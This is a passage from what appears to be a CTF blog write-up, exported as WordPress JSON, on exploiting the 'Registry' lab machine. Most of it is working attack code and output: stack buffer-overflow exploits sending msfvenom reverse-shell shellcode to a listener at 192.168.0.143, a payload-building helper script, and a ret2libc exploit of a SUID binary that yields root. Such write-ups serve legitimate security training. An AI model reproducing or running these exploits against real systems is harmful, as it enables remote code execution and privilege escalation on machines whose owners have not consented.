b&quot;\\x03\\xba\\x14\\x99\\x60\\xc6\\xc1\\xdf\\x8b\\x36\\x12&quot;\nshellcode += b&quot;\\x80\\x02\\xd3\\x23\\x80\\x71\\x90\\x14\\x30\\xf1\\xf4&quot;\nshellcode += b&quot;\\x98\\xbb\\x57\\xec\\x2b\\xc9\\x7f\\x03\\x9b\\x64\\xa6&quot;\nshellcode += b&quot;\\x2a\\x1c\\xd4\\x9a\\x2d\\x9e\\x27\\xcf\\x8d\\x9f\\xe7&quot;\nshellcode += b&quot;\\x02\\xcc\\xd8\\x1a\\xee\\x9c\\xb1\\x51\\x5d\\x30\\xb5&quot;\nshellcode += b&quot;\\x2c\\x5e\\xbb\\x85\\xa1\\xe6\\x58\\x5d\\xc3\\xc7\\xcf&quot;\nshellcode += b&quot;\\xd5\\x9a\\xc7\\xee\\x3a\\x97\\x41\\xe8\\x5f\\x92\\x18&quot;\nshellcode += b&quot;\\x83\\x94\\x68\\x9b\\x45\\xe5\\x91\\x30\\xa8\\xc9\\x63&quot;\nshellcode += b&quot;\\x48\\xed\\xee\\x9b\\x3f\\x07\\x0d\\x21\\x38\\xdc\\x6f&quot;\nshellcode += b&quot;\\xfd\\xcd\\xc6\\xc8\\x76\\x75\\x22\\xe8\\x5b\\xe0\\xa1&quot;\nshellcode += b&quot;\\xe6\\x10\\x66\\xed\\xea\\xa7\\xab\\x86\\x17\\x23\\x4a&quot;\nshellcode += b&quot;\\x48\\x9e\\x77\\x69\\x4c\\xfa\\x2c\\x10\\xd5\\xa6\\x83&quot;\nshellcode += b&quot;\\x2d\\x05\\x09\\x7b\\x88\\x4e\\xa4\\x68\\xa1\\x0d\\xa1&quot;\nshellcode += 
b&quot;\\x5d\\x88\\xad\\x31\\xca\\x9b\\xde\\x03\\x55\\x30\\x48&quot;\nshellcode += b&quot;\\x28\\x1e\\x9e\\x8f\\x4f\\x35\\x66\\x1f\\xae\\xb6\\x97&quot;\nshellcode += b&quot;\\x36\\x75\\xe2\\xc7\\x20\\x5c\\x8b\\x83\\xb0\\x61\\x5e&quot;\nshellcode += b&quot;\\x03\\xe0\\xcd\\x31\\xe4\\x50\\xae\\xe1\\x8c\\xba\\x21&quot;\nshellcode += b&quot;\\xdd\\xad\\xc5\\xeb\\x76\\x47\\x3c\\x7c\\xb9\\x30\\x3e&quot;\nshellcode += b&quot;\\xf3\\x51\\x43\\x3e\\x06\\x22\\xca\\xd8\\x72\\x32\\x9b&quot;\nshellcode += b&quot;\\x73\\xeb\\xab\\x86\\x0f\\x8a\\x34\\x1d\\x6a\\x8c\\xbf&quot;\nshellcode += b&quot;\\x92\\x8b\\x43\\x48\\xde\\x9f\\x34\\xb8\\x95\\xfd\\x93&quot;\nshellcode += b&quot;\\xc7\\x03\\x69\\x7f\\x55\\xc8\\x69\\xf6\\x46\\x47\\x3e&quot;\nshellcode += b&quot;\\x5f\\xb8\\x9e\\xaa\\x4d\\xe3\\x08\\xc8\\x8f\\x75\\x72&quot;\nshellcode += b&quot;\\x48\\x54\\x46\\x7d\\x51\\x19\\xf2\\x59\\x41\\xe7\\xfb&quot;\nshellcode += b&quot;\\xe5\\x35\\xb7\\xad\\xb3\\xe3\\x71\\x04\\x72\\x5d\\x28&quot;\nshellcode += b&quot;\\xfb\\xdc\\x09\\xad\\x37\\xdf\\x4f\\xb2\\x1d\\xa9\\xaf&quot;\nshellcode += b&quot;\\x03\\xc8\\xec\\xd0\\xac\\x9c\\xf8\\xa9\\xd0\\x3c\\x06&quot;\nshellcode += b&quot;\\x60\\x51\\x5c\\xe5\\xa0\\xac\\xf5\\xb0\\x21\\x0d\\x98&quot;\nshellcode += b&quot;\\x42\\x9c\\x52\\xa5\\xc0\\x14\\x2b\\x52\\xd8\\x5d\\x2e&quot;\nshellcode += b&quot;\\x1e\\x5e\\x8e\\x42\\x0f\\x0b\\xb0\\xf1\\x30\\x1e&quot;\n\npayload = junk + jmp_addr + nops + shellcode + b&quot;\\n\\r&quot;   # line terminator (LF then CR, not a true CRLF)\n\ns.send(payload)\ndata = s.recv(1024)   # reply, if any; the shell itself reaches the listener\ns.close()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158502.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158502.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705220912194\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158503.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158503.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705220926415\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>That gives a cmd shell, but it is wine&#039;s cmd on what is really a Linux host, which is awkward to work from. A wine process is just an ordinary 32-bit Linux process, so a native <code>linux\/x86<\/code> payload works from the same overflow: its <code>int 0x80<\/code> syscalls go straight to the kernel and yield a real Linux shell as gato. Only the shellcode changes; the offset and the gadget stay the same:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ msfvenom -p linux\/x86\/shell_reverse_tcp LHOST=192.168.0.143 LPORT=1234 EXITFUNC=thread -b &quot;\\x00\\x0a&quot; -f python\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n[-] No arch selected, selecting arch: x86 from the payload\nFound 11 compatible encoders\nAttempting to encode payload with 1 iterations of x86\/shikata_ga_nai\nx86\/shikata_ga_nai succeeded with size 95 (iteration=0)\nx86\/shikata_ga_nai chosen with final size 95\nPayload size: 95 bytes\nFinal size of python file: 479 bytes\nbuf =  
b&quot;&quot;\nbuf += b&quot;\\xd9\\xc9\\xd9\\x74\\x24\\xf4\\xb8\\xa8\\xb2\\x01\\xac\\x5a&quot;\nbuf += b&quot;\\x33\\xc9\\xb1\\x12\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\xea&quot;\nbuf += b&quot;\\xa1\\xe3\\x59\\xdb\\x1e\\x14\\x42\\x48\\xe2\\x88\\xef\\x6c&quot;\nbuf += b&quot;\\x6d\\xcf\\x40\\x16\\xa0\\x90\\x32\\x8f\\x8a\\xae\\xf9\\xaf&quot;\nbuf += b&quot;\\xa2\\xa9\\xf8\\xc7\\xf4\\xe2\\xfb\\x98\\x9d\\xf0\\xfb\\xa2&quot;\nbuf += b&quot;\\x8f\\x7c\\x1a\\x1a\\x49\\x2f\\x8c\\x09\\x25\\xcc\\xa7\\x4c&quot;\nbuf += b&quot;\\x84\\x53\\xe5\\xe6\\x79\\x7b\\x79\\x9e\\xed\\xac\\x52\\x3c&quot;\nbuf += b&quot;\\x87\\x3b\\x4f\\x92\\x04\\xb5\\x71\\xa2\\xa0\\x08\\xf1&quot;<\/code><\/pre>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((&quot;192.168.0.115&quot;, 42424))\n\noffset = 146                     # unchanged: same binary, same overflow\njunk = b&#039;A&#039; * offset\njmp_addr = b&quot;\\xc3\\x14\\x04\\x08&quot;   # 0x080414c3 jmp esp, little-endian\nnops = b&quot;\\x90&quot; * 100\n\n# linux\/x86 reverse shell: runs as native Linux code inside the wine process\nshellcode =  b&quot;&quot;\nshellcode += b&quot;\\xd9\\xc9\\xd9\\x74\\x24\\xf4\\xb8\\xa8\\xb2\\x01\\xac\\x5a&quot;\nshellcode += b&quot;\\x33\\xc9\\xb1\\x12\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\xea&quot;\nshellcode += b&quot;\\xa1\\xe3\\x59\\xdb\\x1e\\x14\\x42\\x48\\xe2\\x88\\xef\\x6c&quot;\nshellcode += b&quot;\\x6d\\xcf\\x40\\x16\\xa0\\x90\\x32\\x8f\\x8a\\xae\\xf9\\xaf&quot;\nshellcode += b&quot;\\xa2\\xa9\\xf8\\xc7\\xf4\\xe2\\xfb\\x98\\x9d\\xf0\\xfb\\xa2&quot;\nshellcode += b&quot;\\x8f\\x7c\\x1a\\x1a\\x49\\x2f\\x8c\\x09\\x25\\xcc\\xa7\\x4c&quot;\nshellcode += b&quot;\\x84\\x53\\xe5\\xe6\\x79\\x7b\\x79\\x9e\\xed\\xac\\x52\\x3c&quot;\nshellcode += b&quot;\\x87\\x3b\\x4f\\x92\\x04\\xb5\\x71\\xa2\\xa0\\x08\\xf1&quot;\n\npayload = junk + jmp_addr + nops + shellcode + b&quot;\\n\\r&quot;   # line terminator (LF then CR, not a true CRLF)\n\ns.send(payload)\ndata = s.recv(1024)\ns.close()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
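><\/div><\/p>\n<p>The three steps above (reading the crash, finding the return-address offset with the cyclic pattern, and assembling padding, <code>jmp esp<\/code> address, NOP sled and shellcode while avoiding <code>\\x00<\/code> and <code>\\x0a<\/code>) are easy to get subtly wrong; the classic slip is writing the gadget address in the big-endian order ropper prints it. The Python below is an added example written for this page, not code from the original write-up: it re-implements the Metasploit pattern so the 0x39654138 to 146 lookup can be checked offline, triages a wine register dump (a constructed excerpt of the one shown above) to confirm that EIP and every word at ESP are attacker bytes, and builds the payload with a bad-character check on both the gadget address and the shellcode. The dump excerpt, the one-byte <code>int3<\/code> stand-in for the shellcode and the <code>send_payload<\/code> helper are illustration assumptions; offset 146, gadget 0x080414c3 and the two bad bytes are the values from this article.<\/p>

```python
import re
import string
import struct

# --- 1. Metasploit-style cyclic pattern, as msf-pattern_create emits it:
#        Aa0Aa1...Aa9Ab0... (digit changes fastest, then lowercase, then uppercase)

def pattern_create(length):
    '''First `length` bytes of the uppercase/lowercase/digit pattern.'''
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip, length=20280):
    '''Offset of the four pattern bytes that landed in EIP. `eip` is the value
    as the debugger shows it (0x39654138), i.e. the little-endian reading of
    the bytes 8Ae9; returns -1 if those bytes are not part of the pattern.'''
    return pattern_create(length).find(struct.pack('<I', eip))


# --- 2. Triage of a wine crash dump: is EIP ours, and does ESP point into our data?
#        Constructed excerpt of the dump the service printed after 1220 x 'a'.
CONSTRUCTED_DUMP = '''
Unhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).
 EIP:61616161 ESP:008d19a4 EBP:61616161 EFLAGS:00010286(  R- --  I S - -P- )
Stack dump:
0x008d19a4:  61616161 61616161 61616161 61616161
0x008d19b4:  61616161 61616161 61616161 61616161
'''


def triage_wine_crash(dump, fill=b'a'):
    '''(eip_controlled, esp_in_buffer). Both True means the saved return
    address was overwritten with our fill byte and the stack under ESP is
    our data too, which is exactly the precondition for a jmp esp exploit.'''
    word = struct.unpack('<I', fill * 4)[0]
    eip = int(re.search(r'EIP:([0-9a-fA-F]{8})', dump).group(1), 16)
    stack = [int(w, 16)
             for line in dump.splitlines() if re.match(r'0x[0-9a-fA-F]{8}:', line)
             for w in line.split(':', 1)[1].split()]
    return eip == word, bool(stack) and all(w == word for w in stack)


# --- 3. Payload assembly with bad-character checks

def find_bad_chars(blob, bad_chars):
    '''Sorted list of bad byte values present in `blob` (empty list if clean).'''
    return sorted(set(blob) & set(bad_chars))


def build_payload(offset, gadget, shellcode, bad_chars=bytes([0x00, 0x0a]), nop_len=100):
    '''junk | little-endian gadget address | NOP sled | shellcode | LF CR.
    Raises ValueError if the address or the shellcode contains a bad byte,
    because either one would truncate or corrupt the line the service reads.'''
    ret = struct.pack('<I', gadget)          # 0x080414c3 -> c3 14 04 08
    for name, blob in (('gadget address', ret), ('shellcode', shellcode)):
        bad = find_bad_chars(blob, bad_chars)
        if bad:
            raise ValueError('%s contains bad bytes %s' % (name, [hex(b) for b in bad]))
    terminator = bytes([0x0a, 0x0d])         # same LF+CR tail the exploit sends
    return b'A' * offset + ret + bytes([0x90]) * nop_len + shellcode + terminator


def send_payload(host, port, payload, timeout=5):
    '''Deliver one line to the service and return its reply (empty on timeout).
    Not called below; the shell itself arrives at your listener.'''
    import socket
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            return s.recv(1024)
        except socket.timeout:
            return b''


if __name__ == '__main__':
    print('EIP controlled / ESP in buffer:', triage_wine_crash(CONSTRUCTED_DUMP))
    print('offset for EIP 0x39654138:', pattern_offset(0x39654138))
    stand_in = bytes([0xcc])                 # int3 as a stand-in for msfvenom output
    payload = build_payload(146, 0x080414c3, stand_in)
    print('payload length:', len(payload), 'ret bytes:', payload[146:150].hex())
    try:
        build_payload(146, 0x08040a00, stand_in)   # address with 00 and 0a bytes
    except ValueError as err:
        print('rejected:', err)
```

<p>Run it as a script for a short report, or import it and hand <code>build_payload<\/code> the msfvenom bytes. The bad-byte check on the address is the part the page&#039;s workflow lacks: the encoder keeps <code>\\x00<\/code> and <code>\\x0a<\/code> out of the shellcode, but nothing checks the gadget address itself, and a <code>jmp esp<\/code> at an address containing one of those bytes would silently truncate the line.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 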
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158504.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158504.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705222732254\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158505.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158505.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705222741196\" \/><\/div><\/p>\n<h4>Privilege escalation to root<\/h4>\n<p>As gato, list the files this user owns. <code>\/opt\/fixed<\/code> is readable only by gato and contains a root-owned SUID binary, <code>new<\/code>:<\/p>\n<pre><code class=\"language-bash\">(remote) gato@registry:\/home\/gato\/.ssh$ find \/ -user gato 2&gt;\/dev\/null | grep -v proc\n......\n\/home\/gato\/.php_history\n\/var\/crash\/_opt_others_program.1000.crash\n\/opt\n\/opt\/projects\n\/opt\/projects\/MyFirstProgram.exe\n\/opt\/fixed\n(remote) gato@registry:\/home\/gato\/.ssh$ ls -la \/opt\/fixed\ntotal 24\ndrwx------ 2 gato gato  4096 Jul 24  2023 .\ndr-xr-xr-x 5 gato gato  4096 Jul 24  2023 ..\n-rwsr-xr-x 1 root root 14940 Jul 24  2023 new\n(remote) gato@registry:\/home\/gato\/.ssh$ file 
\/opt\/fixed\/new\n\/opt\/fixed\/new: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, BuildID[sha1]=869b300da96175f44db43fb5a34c9f56d012163d, for GNU\/Linux 3.2.0, not stripped\n\n(remote) gato@registry:\/opt\/fixed$ .\/new a\n(remote) gato@registry:\/opt\/fixed$ checksec new\n[*] Checking for new versions of pwntools\n    To disable this functionality, set the contents of \/home\/gato\/.cache\/.pwntools-cache-2.7\/update to &#039;never&#039; (old way).\n    Or add the following lines to ~\/.pwn.conf or ~\/.config\/pwn.conf (or \/etc\/pwn.conf system-wide):\n        [update]\n        interval=never\n[*] A newer version of pwntools is available on pypi (4.10.0 --&gt; 4.12.0).\n    Update with: $ pip install -U pwntools\n[!] Could not populate PLT: invalid syntax (unicorn.py, line 110)\n[*] &#039;\/opt\/fixed\/new&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)<\/code><\/pre>\n<p>\u8fdb\u884c\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gato@registry:\/opt\/fixed$ gdb .\/new\nGNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1\nCopyright (C) 2022 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType &quot;show copying&quot; and &quot;show warranty&quot; for details.\nThis GDB was configured as &quot;x86_64-linux-gnu&quot;.\nType &quot;show configuration&quot; for configuration details.\nFor bug reporting instructions, please see:\n&lt;https:\/\/www.gnu.org\/software\/gdb\/bugs\/&gt;.\nFind the GDB manual and other documentation resources online at:\n    &lt;http:\/\/www.gnu.org\/software\/gdb\/documentation\/&gt;.\n\nFor help, type &quot;help&quot;.\nType &quot;apropos 
word&quot; to search for commands related to &quot;word&quot;...\nReading symbols from .\/new...\n(No debugging symbols found in .\/new)\n......\n\u4e2d\u95f4\u6709\u5565\u62a5\u9519\u6309\u7167\u63a8\u8350\u8d70\u7684\n......\ngdb-peda$ run $(pattern_create 200)\n\nFatal signal: Segmentation fault<\/code><\/pre>\n<p>\u5b58\u5728\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u627e\u4e00\u4e0b\u504f\u79fb\u91cf\uff1a<\/p>\n<pre><code class=\"language-bash\">gdb-peda$ pattern_arg 200<\/code><\/pre>\n<pre><code class=\"language-bash\">[----------------------------------registers-----------------------------------]\nEAX: 0xffc83700 (&quot;AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\nEBX: 0x6c414150 (&#039;PAAl&#039;)\nECX: 0xffc83e20 (&quot;AAwAAZAAxAAyA&quot;)\nEDX: 0xffc837bb (&quot;AAwAAZAAxAAyA&quot;)\nESI: 0xffc837d0 --&gt; 0x2 \nEDI: 0xf7f50b80 --&gt; 0x0 \nEBP: 0x41514141 (&#039;AAQA&#039;)\nESP: 0xffc83790 (&quot;RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\nEIP: 0x41416d41 (&#039;AmAA&#039;)\nEFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\nInvalid $PC address: 0x41416d41\n[------------------------------------stack-------------------------------------]\n0000| 0xffc83790 (&quot;RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0004| 0xffc83794 (&quot;AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0008| 0xffc83798 (&quot;ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0012| 0xffc8379c (&quot;TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0016| 0xffc837a0 (&quot;AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0020| 0xffc837a4 (&quot;ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0024| 0xffc837a8 
(&quot;VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n0028| 0xffc837ac (&quot;AAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;)\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x41416d41 in ?? ()\ngdb-peda$ pattern_offset 0x41416d41\n1094806849 found at offset: 140<\/code><\/pre>\n<p>\u6309\u7167\u4f5c\u8005\u7684\u505a\u6cd5\uff0c\u770b\u4e86\u8fd9\u4e9b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gato@registry:\/opt\/fixed$ ldd new\n        linux-gate.so.1 (0xf7f9b000)\n        libc.so.6 =&gt; \/lib\/i386-linux-gnu\/libc.so.6 (0xf7c8f000)\n        \/lib\/ld-linux.so.2 (0xf7f9d000)\n(remote) gato@registry:\/opt\/fixed$ readelf -s \/lib\/i386-linux-gnu\/libc.so.6 | grep -E &quot; system| exit&quot;\n   460: 0003a460    39 FUNC    GLOBAL DEFAULT   15 exit@@GLIBC_2.0\n  2166: 00048170    63 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0\n(remote) gato@registry:\/opt\/fixed$ strings -a -t x \/lib\/i386-linux-gnu\/libc.so.6  | grep \/bin\/sh\n 1bd0d5 \/bin\/sh<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5\u7f16\u5199\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python2\nfrom pwn import p32\n\noffset = 140\njunk = b&quot;A&quot; * offset\nlibc = 0xf7c8f000\nsystem_addr = p32(libc + 0x00048170)\nexit_addr = p32(libc + 0x0003a460)\nbin_sh_addr = p32(libc + 0x001bd0d5)\n\npayload = junk + system_addr + exit_addr + bin_sh_addr\nprint(payload)<\/code><\/pre>\n<p>\u7136\u540e\u8fd0\u884c\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) gato@registry:\/opt\/fixed$ cd \/tmp\n(remote) gato@registry:\/tmp$ nano exp.py\n(remote) gato@registry:\/tmp$ chmod +x exp.py\n(remote) gato@registry:\/tmp$ while :; do \/opt\/fixed\/new $(python2 exp.py); done\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\nSegmentation fault (core dumped)\nSegmentation fault (core 
dumped)\n.......<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158506.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158506.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706015706068\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u4e0b\uff0c\u54c8\u54c8\u54c8\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">root@registry:\/root# ls -la\ntotal 40\ndrwx------  7 root root 4096 Jul 24  2023 .\ndrwxr-xr-x 19 root root 4096 Jul 24  2023 ..\nlrwxrwxrwx  1 root root    9 Jul 24  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3813 Jul 24  2023 .bashrc\ndrwx------  4 root root 4096 Jul 24  2023 .cache\ndrwxr-xr-x  3 root root 4096 Jul 24  2023 .config\ndrwxr-xr-x  3 root root 4096 Jul 24  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root    0 Jul 24  2023 .python_history\ndrwx------  2 root root 4096 Jul 24  2023 .ssh\ndrwxr-xr-x  4 root root 4096 Jul 24  2023 .wine\n-rw-r--r--  1 root root   39 Jul 24  2023 root.txt\nroot@registry:\/root# cat root.txt \nREGISTRY{7H3_BUFF3R_0V3RF10W_15_FUNNY}<\/code><\/pre>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/lander4k.github.io\/posts\/HMVM-Registry\/\">https:\/\/lander4k.github.io\/posts\/HMVM-Registry\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Registry \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.153 &#8212; -A Open 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,19],"tags":[],"class_list":["post-714","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-pwn"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=714"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/714\/revisions"}],"predecessor-version":[{"id":715,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/714\/revisions\/715"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=714"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}